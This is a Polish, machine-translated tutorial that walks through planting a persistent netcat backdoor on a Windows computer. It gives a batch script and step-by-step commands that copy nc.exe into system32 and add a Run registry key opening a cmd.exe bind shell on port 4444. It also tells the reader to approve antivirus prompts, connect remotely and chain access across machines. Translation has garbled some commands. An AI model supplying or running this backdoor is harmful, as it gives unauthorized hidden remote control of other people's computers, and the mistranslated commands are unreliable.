Netcat Fun!: 5 kroków

2024 Autor: John Day | [email protected]. Ostatnio zmodyfikowany: 2024-01-30 11:32

Ta instrukcja pokazuje, jak utworzyć backdoora na komputerze za pomocą netcata! Pokażę ci dwa sposoby na zrobienie tego, z i bez mojego pliku wsadowego, który zautomatyzuje to za Ciebie. Ta instrukcja już zakłada, że masz już uprawnienia roota na komputerze, prawdopodobnie z 0phcrack LiveCD tutaj. Teraz przejdźmy do instrukcji.

Krok 1: Pobierz Netcat

Oszczędziłem ci kłopotów z 3 minutami przeszukiwania Google i umieściłem nc.exe w instrukcjach do pobrania. Opcjonalnie możesz również pobrać nc.bat, który jest plikiem wsadowym, który stworzyłem, aby zautomatyzować proces. Upewnij się, że jeśli pobierzesz nc.bat, to jest to 464 bajty, ponieważ ciągle wgrywałem wersje i dowiadywałem się, że coś jest z nim nie tak. Jeśli nie jest to 464 bajty, program nie będzie odpowiadał tej instrukcji.

Krok 2: Z Nc.bat

Po pierwsze, oba pliki muszą znajdować się w tym samym katalogu, aby nc.bat działał poprawnie. Do tej operacji proponuję użyć pendrive'a lub CD-ROM-u. Użyłem do tego 512 MB pendrive'a dla geeków, ale to tylko ja. Skopiuj więc pliki na zewnętrzne urządzenie multimedialne i przenieś je na komputer, na którym masz root. Wejdź na urządzenie multimedialne i kliknij dwukrotnie nc.bat. Spowoduje to skopiowanie pliku nc.exe do folderu system32, w katalogu głównym systemu (zwykle C:\Windows lub C:\WINNT) i wprowadzenie niezbędnych zmian w rejestrze. Następnie zapisz adres IP. Będzie to coś w stylu „192.168.1.103”, który jest mój. Po wykonaniu tej czynności uruchom ponownie komputer i zaloguj się. Następnie program antywirusowy może zapytać, czy chcesz zezwolić/zabronić programu. Kliknij „Zezwól” lub podobny. Pamiętaj, że w tej instrukcji możesz telnetować się tylko z sieci lokalnej tego komputera. Następnie wyjdź lub wyloguj się, lub cokolwiek innego chcesz.

Krok 3: Bez Nc.bat

Aby to zrobić, musisz mieć nc.exe na dysku CD lub Flash. Przejdź do komputera, zaloguj się i podłącz dysk flash lub włóż płytę CD. Stąd są dwa sposoby: Dopracowany graficzny interfejs użytkownika systemu Windows lub brudny, staromodny sposób wiersza poleceń. Brudny, staromodny sposób wiersza poleceń:Wyciągnij wiersz poleceń, przechodząc do StartRun i wpisz:

cmd.exePrzejdź do pamięci flash lub napędu CD. Jeśli nie wiesz, który dysk jest który, kliknij prawym przyciskiem myszy przycisk Start i kliknij Eksploruj. Klikaj wszystkie nielokalne dyski w Mój komputer, aż dojdziesz do napędu flash/CD. Zapamiętaj literę dysku i wróć do wiersza polecenia. Wpisz literę dysku, po której następuje dwukropek, w następujący sposób: K: Następnie wpisuj po jednym wierszu, a następnie naciśnij klawisz powrotu

skopiuj nc.exe %systemroot%\system32\nc.exereg dodaj HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 - t -e cmd.exe"To była właściwie instalacja. Wszystko, co musisz teraz wiedzieć, to lokalny adres IP, który można łatwo znaleźć, wpisując polecenie „ipconfig” i szukając czegoś w tabeli, takiego jak „192.168.1.103”. Następnie uruchom ponownie komputer i zaloguj się ponownie. Program antywirusowy może zapytać, czy chcesz zezwolić/zabronić. Kliknij zezwól. Wtedy możesz robić z komputerem, co chcesz. Dopracowane interfejsy graficzne systemu WindowsKliknij prawym przyciskiem myszy przycisk Start i kliknij Eksploruj. Klikaj wszystkie nielokalne dyski w Mój komputer, aż dojdziesz do napędu flash/CD. Następnie kliknij prawym przyciskiem myszy nc.exe i skopiuj. Następnie przejdź do dysku C i kliknij folder Windows lub WINNT. Następnie przejdź do folderu system32 i wklej nc.exe. Zamknij to i przejdź do StartRun. Wpisz regedit. Przejdź przez foldery do: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunNastępnie kliknij prawym przyciskiem myszy puste miejsce i przejdź do wartości NewString. Wpisz dowolną nazwę jako nazwę, ale jako wartość wpisz

%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exeTo była właściwie instalacja. Wszystko, co musisz teraz wiedzieć, to lokalny adres IP, który można łatwo znaleźć, wpisując polecenie „ipconfig” w wierszu poleceń (StartRun:cmd.exe) i szukając czegoś w tabeli, takiego jak „192.168.1.103”. Następnie uruchom ponownie komputer i zaloguj się ponownie. Program antywirusowy może zapytać, czy chcesz zezwolić/zabronić. Kliknij zezwól. Wtedy możesz robić z komputerem, co chcesz.

Krok 4: Powrót do środka

Po zainstalowaniu i chcesz przejąć kontrolę nad hostem, otwórz wiersz polecenia lub PuTTY. Myślę, że PuTTY jest niesamowity, więc pozwolę ci go pobrać tutaj. Za pomocą PuTTYPobierz i otwórz PuTTY.exe. Kliknij protokół „surowy”. W polu tekstowym port # wpisz 4444. W polu „adres hosta” wpisz adres IP, który zapisałeś podczas instalacji. Następnie naciśnij Enter. PuTTY powinien połączyć się z pudełkiem, a otrzymasz wiersz polecenia. Korzystanie z wiersza poleceniaOtwórz wiersz polecenia i wpisz „telnet 4444”. Następnie naciśnij Enter i powinieneś otrzymać wiersz polecenia. Umożliwi to zdalne wykonanie prawie wszystkiego, co chcesz na komputerze, co możesz zrobić za pomocą konta lokalnego. Naprawdę zaczyna się robić ciekawie, kiedy wchodzisz do jednego komputera, a potem z tego komputera do innego, aby połączyć ze sobą cały łańcuch komputerów. Baw się (legalnie)!

Krok 5: Kod źródłowy

Ponieważ zostałem poproszony, umieszczę kod źródłowy (dla pliku wsadowego) i wyjaśnię każde polecenie i co robi. Być świadomym! To jest aktualna wersja programu do instalacji wsadowej. Jeśli twój jest inny, kod będzie inny.

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 goto regeditgoto error:regeditreg dodaj HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc. exe -L -d -p 4444 -t -e cmd.exe"jeśli poziom błędu 0 goto ip:errorecho wystąpiło coś nieoczekiwanego, a program musi wyjść.goto end:ipecho zapisz adres IP z tableipconfig:endecho end.echo taśma klejąca out.pause@echo off-Informuje, aby nie wyświetlać poleceń podczas wykonywania.copy nc.exe %systemroot%\system32\nc.exe-zazwyczaj kopiuje netcata do C:\WINDOWS\system32. To sprawia, że kiedy wracasz, zamiast cały czas zmieniać katalogi, możesz po prostu wpisać "nc", aby otworzyć inny port.if errorlevel 0 goto regedit-error checking. Jeśli kopia się powiodła, edytuje błąd register.goto - Jeśli wystąpił błąd, przejdź do etykiety:error label.:regedit - A, określając, że gdy program mówi „goto regedit”, przejdź tutaj.reg dodaj HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(przypuszczalnie być jedną linią), który dodaje klucz rejestru do ponownego uruchomienia programu po ponownym uruchomieniu. /f oznacza zastąpienie istniejącego klucza, /v dla nazwy klucza, /d dla danych. Pozostałe tagi to dane wejściowe dla netcata. -L mówi, aby uruchomić go ponownie przy wyjściu, więc nie musisz czekać na ponowne uruchomienie komputera. -Czy zapomniałem. -p 4444 określa numer portu. - zapomniałem. -e cmd.exe powoduje, że wiersz polecenia uruchamia się przy zdalnym połączeniu. Jeśli poziom błędu 0 przejdź do sprawdzania błędów ip. Jeśli przebieg nie powiódł się, pominie tę linię i przejdzie do:etykieta błędu.echo wydarzyło się coś nieoczekiwanego i program musi wyjść. -nakazuje programowi wydrukowanie „wystąpiło coś nieoczekiwanego i program musi zakończyć " na koniec screen.goto - jeśli pojawił się komunikat o błędzie, coś poszło nie tak i program i tak musi się zamknąć.:ip-Again, label.echo zapisz adres IP z tabeli-Zapisuje "zapisz adres IP adres z tabeli" do screen.ipconfig-To jest polecenie, które wypisuje informacje o ustawieniach sieci lokalnej (LAN).:end-Label.echo end.-wypisuje "end" do screen.echo taśmą klejącą. -zapisuje "taśmą" do screen.pause-to polecenie wstrzymuje program i czeka, aż użytkownik naciśnie klawisz. W tym programie czeka na dane wejściowe, a następnie wychodzi z programu.